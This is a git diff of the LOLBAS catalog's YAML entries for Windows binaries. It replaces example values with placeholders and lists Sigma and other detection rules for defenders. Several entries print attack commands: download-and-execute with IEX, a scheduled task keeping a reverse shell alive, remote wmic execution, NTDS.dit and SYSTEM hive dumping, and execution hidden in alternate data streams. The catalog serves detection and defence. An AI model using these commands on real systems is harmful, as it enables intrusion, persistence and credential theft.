C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe - Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_runscripthelper.yml - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules diff --git a/yml/OSBinaries/Sc.yml b/yml/OSBinaries/Sc.yml index 7766c06..637a9f9 100644 --- a/yml/OSBinaries/Sc.yml +++ b/yml/OSBinaries/Sc.yml @@ -1,7 +1,7 @@ --- Name: Sc.exe Description: Used by Windows to manage services -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - - Command: sc config binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start + - Command: sc config {ExistingServiceName} binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start {ExistingServiceName} Description: Modifies an existing service and executes the file stored in the ADS. Usecase: Execute binary file hidden inside an alternate data stream Category: ADS @@ -25,8 +25,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\sc.exe - Path: C:\Windows\SysWOW64\sc.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_susp_service_creation.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml diff --git a/yml/OSBinaries/Schtasks.yml b/yml/OSBinaries/Schtasks.yml index a938e76..d7495f2 100644 --- a/yml/OSBinaries/Schtasks.yml +++ b/yml/OSBinaries/Schtasks.yml @@ -1,10 +1,10 @@ --- Name: Schtasks.exe Description: Schedule periodic tasks -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr c:\some\directory\revshell.exe + - Command: schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr "{CMD}" Description: Create a recurring task to execute every minute. Usecase: Create a recurring task to keep reverse shell session(s) alive Category: Execute @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: CMD - - Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily + - Command: schtasks /create /s targetmachine /tn "MyTask" /tr "{CMD}" /sc daily Description: Create a scheduled task on a remote computer for persistence/lateral movement Usecase: Create a remote task to run daily relative to the the time of creation Category: Execute @@ -25,8 +25,6 @@ Commands: Full_Path: - Path: c:\windows\system32\schtasks.exe - Path: c:\windows\syswow64\schtasks.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_schtasks_creation.yml - Elastic: https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/persistence_local_scheduled_task_creation.toml @@ -34,6 +32,3 @@ Detection: - IOC: Suspicious task creation events Resources: - Link: https://isc.sans.edu/forums/diary/Adding+Persistence+Via+Scheduled+Tasks/23633/ -Acknowledgement: - - Person: - Handle: diff --git a/yml/OSBinaries/Scriptrunner.yml b/yml/OSBinaries/Scriptrunner.yml index bd8b118..4c8fb48 100644 --- a/yml/OSBinaries/Scriptrunner.yml +++ b/yml/OSBinaries/Scriptrunner.yml @@ -1,11 +1,11 @@ --- Name: Scriptrunner.exe Description: Execute binary through proxy binary to evade defensive counter measures -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: Scriptrunner.exe -appvscript calc.exe - Description: Executes calc.exe + - Command: Scriptrunner.exe -appvscript {PATH:.exe} + Description: Executes executable Usecase: Execute binary through proxy binary to evade defensive counter measures Category: Execute Privileges: User @@ -13,8 +13,8 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - - Command: ScriptRunner.exe -appvscript "\\fileserver\calc.cmd" - Description: Executes calc.cmd from remote server + - Command: ScriptRunner.exe -appvscript {PATH_SMB:.cmd} + Description: Executes cmd file from remote server Usecase: Execute binary through proxy binary from external server to evade defensive counter measures Category: Execute Privileges: User @@ -26,8 +26,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\scriptrunner.exe - Path: C:\Windows\SysWOW64\scriptrunner.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_servu_susp_child_process.yml - IOC: Scriptrunner.exe should not be in use unless App-v is deployed diff --git a/yml/OSBinaries/SettingSyncHost.yml b/yml/OSBinaries/SettingSyncHost.yml index 975c831..c2444ee 100644 --- a/yml/OSBinaries/SettingSyncHost.yml +++ b/yml/OSBinaries/SettingSyncHost.yml @@ -1,10 +1,10 @@ --- Name: SettingSyncHost.exe Description: Host Process for Setting Synchronization -Author: 'Elliot Killick' +Author: Elliot Killick Created: 2021-08-26 Commands: - - Command: SettingSyncHost -LoadAndRunDiagScript anything + - Command: SettingSyncHost -LoadAndRunDiagScript {PATH:.exe} Description: Execute file specified in %COMSPEC% Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism Category: Execute @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows 8, Windows 8.1, Windows 10 Tags: - Execute: EXE - - Command: SettingSyncHost -LoadAndRunDiagScriptNoCab anything + - Command: SettingSyncHost -LoadAndRunDiagScriptNoCab {PATH:.bat} Description: Execute a batch script in the background (no window ever pops up) which can be subverted to running arbitrary programs by setting the current working directory to %TMP% and creating files such as reg.bat/reg.exe in that directory thereby causing them to execute instead of the ones in C:\Windows\System32. Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism. Additionally, effectively act as a -WindowStyle Hidden option (as there is in PowerShell) for any arbitrary batch file. Category: Execute diff --git a/yml/OSBinaries/Ssh.yml b/yml/OSBinaries/Ssh.yml index 7b12cf3..3c9fadc 100644 --- a/yml/OSBinaries/Ssh.yml +++ b/yml/OSBinaries/Ssh.yml @@ -1,11 +1,11 @@ --- Name: ssh.exe Description: Ssh.exe is the OpenSSH compatible client can be used to connect to Windows 10 (build 1809 and later) and Windows Server 2019 devices. -Author: 'Akshat Pradhan' -Created: '2021-11-08' +Author: Akshat Pradhan +Created: 2021-11-08 Commands: - - Command: ssh localhost calc.exe - Description: Execute calc.exe on host machine. The prompt for password can be eliminated by adding the host's public key in the user's authorized_keys file. Adversaries can do the same for execution on remote machines. + - Command: ssh localhost "{CMD}" + Description: Executes specified command on host machine. The prompt for password can be eliminated by adding the host's public key in the user's authorized_keys file. Adversaries can do the same for execution on remote machines. Usecase: Execute specified command, can be used for defense evasion. Category: Execute Privileges: User @@ -13,8 +13,8 @@ Commands: OperatingSystem: Windows 10 1809, Windows Server 2019 Tags: - Execute: CMD - - Command: ssh -o ProxyCommand=calc.exe . - Description: Executes calc.exe from ssh.exe + - Command: ssh -o ProxyCommand="{CMD}" . + Description: Executes specified command from ssh.exe Usecase: Performs execution of specified file, can be used as a defensive evasion. Category: Execute Privileges: User diff --git a/yml/OSBinaries/Syncappvpublishingserver.yml b/yml/OSBinaries/Syncappvpublishingserver.yml index 2ab7e48..0cbc5d9 100644 --- a/yml/OSBinaries/Syncappvpublishingserver.yml +++ b/yml/OSBinaries/Syncappvpublishingserver.yml @@ -1,10 +1,10 @@ --- Name: SyncAppvPublishingServer.exe Description: Used by App-v to get App-v server lists -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX" + - Command: SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('{REMOTEURL:.ps1}') | IEX" Description: Example command on how inject Powershell code into the process Usecase: Use SyncAppvPublishingServer as a Powershell host to execute Powershell code. Evade defensive counter measures Category: Execute @@ -16,8 +16,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\SyncAppvPublishingServer.exe - Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml diff --git a/yml/OSBinaries/Tar.yml b/yml/OSBinaries/Tar.yml index 4165dfb..dc0ab5b 100644 --- a/yml/OSBinaries/Tar.yml +++ b/yml/OSBinaries/Tar.yml @@ -1,10 +1,10 @@ --- Name: Tar.exe Description: Used by Windows to extract and create archives. -Author: 'Brian Lucero' +Author: Brian Lucero Created: 2023-01-30 Commands: - - Command: tar -cf compressedfilename:ads C:\folder\file + - Command: tar -cf {PATH}:ads {PATH_ABSOLUTE:folder} Description: Compress one or more files to an alternate data stream (ADS). Usecase: Can be used to evade defensive countermeasures, or to hide as part of a persistence mechanism Category: ADS @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Type: Compression - - Command: tar -xf compressedfilename:ads + - Command: tar -xf {PATH}:ads Description: Decompress a compressed file from an alternate data stream (ADS). Usecase: Can be used to evade defensive countermeasures, or to hide as part of a persistence mechanism Category: ADS @@ -22,8 +22,8 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Type: Compression - - Command: tar -xf \\host1\archive.tar - Description: Extracts archive.tar from the remote (internal) host (host1) to the current host. + - Command: tar -xf {PATH_SMB:.tar} + Description: Extracts archive.tar from the remote (internal) host to the current host. Usecase: Copy files Category: Copy Privileges: User diff --git a/yml/OSBinaries/Ttdinject.yml b/yml/OSBinaries/Ttdinject.yml index 145bd6f..62d9b87 100644 --- a/yml/OSBinaries/Ttdinject.yml +++ b/yml/OSBinaries/Ttdinject.yml @@ -1,11 +1,11 @@ --- Name: Ttdinject.exe Description: Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe) -Author: 'Maxime Nadeau' +Author: Maxime Nadeau Created: 2020-05-12 Commands: - - Command: TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "C:/Windows/System32/calc.exe" - Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated. + - Command: TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "{PATH:.exe}" + Description: Execute a program using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated. Usecase: Spawn process using other binary Category: Execute Privileges: Administrator @@ -13,8 +13,8 @@ Commands: OperatingSystem: Windows 10 2004 and above, Windows 11 Tags: - Execute: EXE - - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "C:/Windows/System32/calc.exe" - Description: Execute calc using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated. + - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "{PATH:.exe}" + Description: Execute a program using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file can be changed, but the length (7) has to be updated. Usecase: Spawn process using other binary Category: Execute Privileges: Administrator @@ -25,8 +25,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\ttdinject.exe - Path: C:\Windows\Syswow64\ttdinject.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/create_remote_thread/create_remote_thread_win_ttdinjec.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/7ea6ed3db65e0bd812b051d9bb4fffd27c4c4d0a/rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml diff --git a/yml/OSBinaries/Tttracer.yml b/yml/OSBinaries/Tttracer.yml index 7c51f38..e67e390 100644 --- a/yml/OSBinaries/Tttracer.yml +++ b/yml/OSBinaries/Tttracer.yml @@ -1,11 +1,11 @@ --- Name: Tttracer.exe Description: Used by Windows 1809 and newer to Debug Time Travel -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2019-11-05 Commands: - - Command: tttracer.exe C:\windows\system32\calc.exe - Description: Execute calc using tttracer.exe. Requires administrator privileges + - Command: tttracer.exe {PATH_ABSOLUTE:.exe} + Description: Execute specified executable from tttracer.exe. Requires administrator privileges. Usecase: Spawn process using other binary Category: Execute Privileges: Administrator @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows 10 1809 and newer, Windows 11 Tags: - Execute: EXE - - Command: TTTracer.exe -dumpFull -attach pid + - Command: TTTracer.exe -dumpFull -attach {PID} Description: Dumps process using tttracer.exe. Requires administrator privileges Usecase: Dump process by PID Category: Dump @@ -23,8 +23,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\tttracer.exe - Path: C:\Windows\SysWOW64\tttracer.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_tttracer_mod_load.yml diff --git a/yml/OSBinaries/Unregmp2.yml b/yml/OSBinaries/Unregmp2.yml index 541818d..856fbe5 100644 --- a/yml/OSBinaries/Unregmp2.yml +++ b/yml/OSBinaries/Unregmp2.yml @@ -1,7 +1,7 @@ --- Name: Unregmp2.exe Description: Microsoft Windows Media Player Setup Utility -Author: 'Wade Hickey' +Author: Wade Hickey Created: 2021-12-06 Commands: - Command: rmdir %temp%\lolbin /s /q 2>nul & mkdir "%temp%\lolbin\Windows Media Player" & copy C:\Windows\System32\calc.exe "%temp%\lolbin\Windows Media Player\wmpnscfg.exe" >nul && cmd /V /C "set "ProgramW6432=%temp%\lolbin" && unregmp2.exe /HideWMP" diff --git a/yml/OSBinaries/Vbc.yml b/yml/OSBinaries/Vbc.yml index 4ede887..9048839 100644 --- a/yml/OSBinaries/Vbc.yml +++ b/yml/OSBinaries/Vbc.yml @@ -4,14 +4,14 @@ Description: Binary file used for compile vbs code Author: Lior Adar Created: 2020-02-27 Commands: - - Command: vbc.exe /target:exe c:\temp\vbs\run.vb + - Command: vbc.exe /target:exe {PATH_ABSOLUTE:.vb} Description: Binary file used by .NET to compile Visual Basic code to an executable. Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile Privileges: User MitreID: T1127 OperatingSystem: Windows 7, Windows 10, Windows 11 - - Command: vbc -reference:Microsoft.VisualBasic.dll c:\temp\vbs\run.vb + - Command: vbc -reference:Microsoft.VisualBasic.dll {PATH_ABSOLUTE:.vb} Description: Binary file used by .NET to compile Visual Basic code to an executable. Usecase: Compile attacker code on system. Bypass defensive counter measures. Category: Compile @@ -25,8 +25,6 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml diff --git a/yml/OSBinaries/Verclsid.yml b/yml/OSBinaries/Verclsid.yml index 55724db..01fe19e 100644 --- a/yml/OSBinaries/Verclsid.yml +++ b/yml/OSBinaries/Verclsid.yml @@ -6,7 +6,7 @@ Created: 2018-12-04 Commands: - Command: verclsid.exe /S /C {CLSID} Description: Used to verify a COM object before it is instantiated by Windows Explorer - Usecase: Run a com object created in registry to evade defensive counter measures + Usecase: Run a COM object created in registry to evade defensive counter measures Category: Execute Privileges: User MitreID: T1218.012 @@ -16,8 +16,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\verclsid.exe - Path: C:\Windows\SysWOW64\verclsid.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml - Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/verclsid_clsid_execution.yml diff --git a/yml/OSBinaries/Wab.yml b/yml/OSBinaries/Wab.yml index 6fa837f..10a64d7 100644 --- a/yml/OSBinaries/Wab.yml +++ b/yml/OSBinaries/Wab.yml @@ -1,7 +1,7 @@ --- Name: Wab.exe Description: Windows address book manager -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: wab.exe @@ -16,8 +16,6 @@ Commands: Full_Path: - Path: C:\Program Files\Windows Mail\wab.exe - Path: C:\Program Files (x86)\Windows Mail\wab.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml - IOC: WAB.exe should normally never be used diff --git a/yml/OSBinaries/Wbadmin.yml b/yml/OSBinaries/Wbadmin.yml index 73c5c7c..0b3b878 100644 --- a/yml/OSBinaries/Wbadmin.yml +++ b/yml/OSBinaries/Wbadmin.yml @@ -4,14 +4,14 @@ Description: Windows Backup Administration utility Author: Chris Eastwood Created: 2024-04-05 Commands: - - Command: wbadmin start backup -backupTarget:C:\temp\ -include:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -quiet + - Command: wbadmin start backup -backupTarget:{PATH_ABSOLUTE:folder} -include:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -quiet Description: Extract NTDS.dit and SYSTEM hive into backup virtual hard drive file (.vhdx) Usecase: Snapshoting of Active Directory NTDS.dit database Category: Dump Privileges: Administrator, Backup Operators, SeBackupPrivilege MitreID: T1003.003 OperatingSystem: Windows Server - - Command: wbadmin start recovery -version: -recoverytarget:C:\temp -itemtype:file -items:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -notRestoreAcl -quiet + - Command: wbadmin start recovery -version: -recoverytarget:{PATH_ABSOLUTE:folder} -itemtype:file -items:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -notRestoreAcl -quiet Description: Restore a version of NTDS.dit and SYSTEM hive into file path. The command `wbadmin get versions` can be used to find version identifiers. Usecase: Dumping of Active Directory NTDS.dit database Category: Dump diff --git a/yml/OSBinaries/Winget.yml b/yml/OSBinaries/Winget.yml index f914071..6c2239b 100644 --- a/yml/OSBinaries/Winget.yml +++ b/yml/OSBinaries/Winget.yml @@ -4,8 +4,8 @@ Description: Windows Package Manager tool Author: Paul Sanders Created: 2022-01-03 Commands: - - Command: winget.exe install --manifest manifest.yml - Description: 'Downloads a file from the web address specified in manifest.yml and executes it on the system. Local manifest setting must be enabled in winget for it to work: `winget settings --enable LocalManifestFiles`' + - Command: winget.exe install --manifest {PATH:.yml} + Description: 'Downloads a file from the web address specified in .yml file and executes it on the system. Local manifest setting must be enabled in winget for it to work: `winget settings --enable LocalManifestFiles`' Usecase: Download and execute an arbitrary file from the internet Category: Execute Privileges: Local Administrator - required to enable local manifest setting @@ -14,7 +14,7 @@ Commands: Tags: - Execute: Remote - Execute: EXE - - Command: winget.exe install --accept-package-agreements -s msstore [name or ID] + - Command: winget.exe install --accept-package-agreements -s msstore {name or ID} Description: 'Download and install any software from the Microsoft Store using its name or Store ID, even if the Microsoft Store App itself is blocked on the machine. For example, use "Sysinternals Suite" or `9p7knl5rwt25` for obtaining ProcDump, PsExec via the Sysinternals Suite. Note: a Microsoft account is required for this.' Usecase: Download and install software from Microsoft Store, even if Microsoft Store App is blocked Category: Download diff --git a/yml/OSBinaries/Wlrmdr.yml b/yml/OSBinaries/Wlrmdr.yml index 913ce05..735fa5e 100644 --- a/yml/OSBinaries/Wlrmdr.yml +++ b/yml/OSBinaries/Wlrmdr.yml @@ -4,8 +4,8 @@ Description: Windows Logon Reminder executable Author: Moshe Kaplan Created: 2022-02-16 Commands: - - Command: "wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u calc.exe" - Description: Execute calc.exe with wlrmdr.exe as parent process + - Command: "wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u {PATH:.exe}" + Description: Execute executable with wlrmdr.exe as parent process Usecase: Use wlrmdr as a proxy binary to evade defensive countermeasures Category: Execute Privileges: User @@ -15,8 +15,6 @@ Commands: - Execute: EXE Full_Path: - Path: c:\windows\system32\wlrmdr.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_wlrmdr.yml - IOC: wlrmdr.exe spawning any new processes diff --git a/yml/OSBinaries/Wmic.yml b/yml/OSBinaries/Wmic.yml index 5cb953c..2438396 100644 --- a/yml/OSBinaries/Wmic.yml +++ b/yml/OSBinaries/Wmic.yml @@ -1,10 +1,10 @@ --- Name: Wmic.exe Description: The WMI command-line (WMIC) utility provides a command-line interface for WMI -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: wmic.exe process call create "c:\ads\file.txt:program.exe" + - Command: wmic.exe process call create "{PATH_ABSOLUTE}:program.exe" Description: Execute a .EXE file stored as an Alternate Data Stream (ADS) Usecase: Execute binary file hidden in Alternate data streams to evade defensive counter measures Category: ADS @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: EXE - - Command: wmic.exe process call create calc + - Command: wmic.exe process call create "{CMD}" Description: Execute calc from wmic Usecase: Execute binary from wmic to evade defensive counter measures Category: Execute @@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: CMD - - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe" + - Command: wmic.exe /node:"192.168.0.1" process call create "{CMD}" Description: Execute evil.exe on the remote system. Usecase: Execute binary on a remote system Category: Execute @@ -32,7 +32,7 @@ Commands: Tags: - Execute: CMD - Execute: Remote - - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl" + - Command: wmic.exe process get brief /format:"{REMOTEURL:.xsl}" Description: Create a volume shadow copy of NTDS.dit that can be copied. Usecase: Execute binary on remote system Category: Execute @@ -42,7 +42,7 @@ Commands: Tags: - Execute: XSL - Execute: Remote - - Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl" + - Command: wmic.exe process get brief /format:"{PATH_SMB:.xsl}" Description: Executes JScript or VBScript embedded in the target remote XSL stylsheet. Usecase: Execute script from remote system Category: Execute diff --git a/yml/OSBinaries/WorkFolders.yml b/yml/OSBinaries/WorkFolders.yml index d2dd19a..f1930ea 100644 --- a/yml/OSBinaries/WorkFolders.yml +++ b/yml/OSBinaries/WorkFolders.yml @@ -1,7 +1,7 @@ --- Name: WorkFolders.exe Description: Work Folders -Author: 'Elliot Killick' +Author: Elliot Killick Created: 2021-08-16 Commands: - Command: WorkFolders diff --git a/yml/OSBinaries/Wscript.yml b/yml/OSBinaries/Wscript.yml index 53b5ed3..9c5c36b 100644 --- a/yml/OSBinaries/Wscript.yml +++ b/yml/OSBinaries/Wscript.yml @@ -1,10 +1,10 @@ --- Name: Wscript.exe Description: Used by Windows to execute scripts -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: wscript //e:vbscript c:\ads\file.txt:script.vbs + - Command: wscript //e:vbscript {PATH}:script.vbs Description: Execute script stored in an alternate data stream Usecase: Execute hidden code to evade defensive counter measures Category: ADS @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: WSH - - Command: echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js + - Command: echo GetObject("script:{REMOTEURL:.js}") > {PATH_ABSOLUTE}:hi.js && wscript.exe {PATH_ABSOLUTE}:hi.js Description: Download and execute script stored in an alternate data stream Usecase: Execute hidden code to evade defensive counter measures Category: ADS diff --git a/yml/OSBinaries/Wsreset.yml b/yml/OSBinaries/Wsreset.yml index 2382a71..0c27e7b 100644 --- a/yml/OSBinaries/Wsreset.yml +++ b/yml/OSBinaries/Wsreset.yml @@ -1,7 +1,7 @@ --- Name: Wsreset.exe Description: Used to reset Windows Store settings according to its manifest file -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2019-03-18 Commands: - Command: wsreset.exe @@ -13,8 +13,6 @@ Commands: OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\wsreset.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml diff --git a/yml/OSBinaries/Wuauclt.yml b/yml/OSBinaries/Wuauclt.yml index 42a1e23..b1b1206 100644 --- a/yml/OSBinaries/Wuauclt.yml +++ b/yml/OSBinaries/Wuauclt.yml @@ -1,11 +1,11 @@ --- Name: wuauclt.exe Description: Windows Update Client -Author: 'David Middlehurst' +Author: David Middlehurst Created: 2020-09-23 Commands: - - Command: wuauclt.exe /UpdateDeploymentProvider Full_Path_To_DLL /RunHandlerComServer - Description: Full_Path_To_DLL would be the absolute path to .DLL file and would execute code on attach. + - Command: wuauclt.exe /UpdateDeploymentProvider {PATH_ABSOLUTE:.dll} /RunHandlerComServer + Description: Loads and executes DLL code on attach. Usecase: Execute dll via attach/detach methods Category: Execute Privileges: User diff --git a/yml/OSBinaries/Xwizard.yml b/yml/OSBinaries/Xwizard.yml index f7fbc3c..c3b5c95 100644 --- a/yml/OSBinaries/Xwizard.yml +++ b/yml/OSBinaries/Xwizard.yml @@ -1,7 +1,7 @@ --- Name: Xwizard.exe Description: Execute custom class that has been added to the registry or download a file with Xwizard.exe -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC} @@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: COM - - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM + - Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /z{REMOTEURL} Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache. Usecase: Download file from Internet Category: Download @@ -34,8 +34,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\xwizard.exe - Path: C:\Windows\SysWOW64\xwizard.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index b6204bf..98eccc4 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -6,21 +6,14 @@ Description: Microsoft Edge Browser Author: 'Mert Daş' Created: 2023-08-18 Commands: - - Command: "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe http://example.com/test.zip" + - Command: "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe {REMOTEURL:.zip}" Description: msedge_proxy will download malicious file. Usecase: Download file from the internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 